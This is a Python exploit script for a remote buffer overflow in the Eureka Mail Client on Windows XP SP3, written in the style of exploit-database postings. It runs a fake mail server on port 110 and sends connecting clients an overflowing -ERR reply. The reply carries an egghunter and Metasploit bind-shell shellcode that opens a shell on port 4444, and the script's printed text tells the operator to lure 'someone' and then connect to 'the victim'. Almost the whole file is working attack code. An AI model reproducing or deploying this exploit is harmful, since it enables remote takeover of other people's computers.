#!/usr/bin/env python ########################################################### # # Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition # Coded By: k4mr4n_st@yahoo.com # Found By: k4mr4n (Securitylab.ir Member) # Tested On: Windows XPSP3 English # Note: This script sets up a fake SMTP server # Note: Set the client to this address and check your mail # ########################################################## import sys, socket # egghunter (32 bytes) egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x77\x30\x30\x74" # this is the egg: w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") # windows/shell_bind_tcp - 368 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=thread, LPORT=4444 bindshell = ("\xbb\xd3\x82\x28\x36\xd9\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x56\x83\xee\xfc\x31\x5e\x0f\x03\x5e\xdc\x60\xdd\xca\x0a\xed" "\x1e\x33\xca\x8e\x97\xd6\xfb\x9c\xcc\x93\xa9\x10\x86\xf6\x41" "\xda\xca\xe2\xd2\xae\xc2\x05\x53\x04\x35\x2b\x64\xa8\xf9\xe7" "\xa6\xaa\x85\xf5\xfa\x0c\xb7\x35\x0f\x4c\xf0\x28\xff\x1c\xa9" "\x27\xad\xb0\xde\x7a\x6d\xb0\x30\xf1\xcd\xca\x35\xc6\xb9\x60" "\x37\x17\x11\xfe\x7f\x8f\x1a\x58\xa0\xae\xcf\xba\x9c\xf9\x64" "\x08\x56\xf8\xac\x40\x97\xca\x90\x0f\xa6\xe2\x1d\x51\xee\xc5" "\xfd\x24\x04\x36\x80\x3e\xdf\x44\x5e\xca\xc2\xef\x15\x6c\x27" "\x11\xfa\xeb\xac\x1d\xb7\x78\xea\x01\x46\xac\x80\x3e\xc3\x53" "\x47\xb7\x97\x77\x43\x93\x4c\x19\xd2\x79\x23\x26\x04\x25\x9c" "\x82\x4e\xc4\xc9\xb5\x0c\x81\x3e\x88\xae\x51\x28\x9b\xdd\x63" "\xf7\x37\x4a\xc8\x70\x9e\x8d\x2f\xab\x66\x01\xce\x53\x97\x0b" "\x15\x07\xc7\x23\xbc\x27\x8c\xb3\x41\xf2\x03\xe4\xed\xac\xe3" "\x54\x4e\x1c\x8c\xbe\x41\x43\xac\xc0\x8b\xf2\xea\x0e\xef\x57" "\x9d\x72\x0f\x46\x01\xfa\xe9\x02\xa9\xaa\xa2\xba\x0b\x89\x7a" "\x5d\x73\xfb\xd6\xf6\xe3\xb3\x30\xc0\x0c\x44\x17\x63\xa0\xec" "\xf0\xf7\xaa\x28\xe0\x08\xe7\x18\x6b\x31\x60\xd2\x05\xf0\x10" "\xe3\x0f\x62\xb0\x76\xd4\x72\xbf\x6a\x43\x25\xe8\x5d\x9a\xa3" "\x04\xc7\x34\xd1\xd4\x91\x7f\x51\x03\x62\x81\x58\xc6\xde\xa5" "\x4a\x1e\xde\xe1\x3e\xce\x89\xbf\xe8\xa8\x63\x0e\x42\x63\xdf" "\xd8\x02\xf2\x13\xdb\x54\xfb\x79\xad\xb8\x4a\xd4\xe8\xc7\x63" "\xb0\xfc\xb0\x99\x20\x02\x6b\x1a\x40\xe1\xb9\x57\xe9\xbc\x28" "\xda\x74\x3f\x87\x19\x81\xbc\x2d\xe2\x76\xdc\x44\xe7\x33\x5a" "\xb5\x95\x2c\x0f\xb9\x0a\x4c\x1a") buff = ("\x41" * 710); retn = ("\x53\x93\x42\x7e"); #JMP ESP USER32.DLL XPSP3 nops = ("\x90" * 218); junk = ("\xcc" * 2000); sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell); print (""" ########################################################## # # Eureka Mail Client Remote Buffer Overflow Exploit (XPSP3) # Coded By: k4mr4n_st@yahoo.com # Found By: k4mr4n (Securitylab.ir Member) # Tested On: Windows XPSP3 # Note: This script sets up a fake SMTP server # Note: Point the client to this address and check your mail # ########################################################## """) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', 110)) s.listen(1) print ("[*] Listening on port 110.") print ("[*] Have someone connect to you.") print ("[*] Type -c to exit.") conn, addr = s.accept() print '[*] Received connection from: ', addr while 1: conn.send(sploit) conn.close() except: print ("[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444")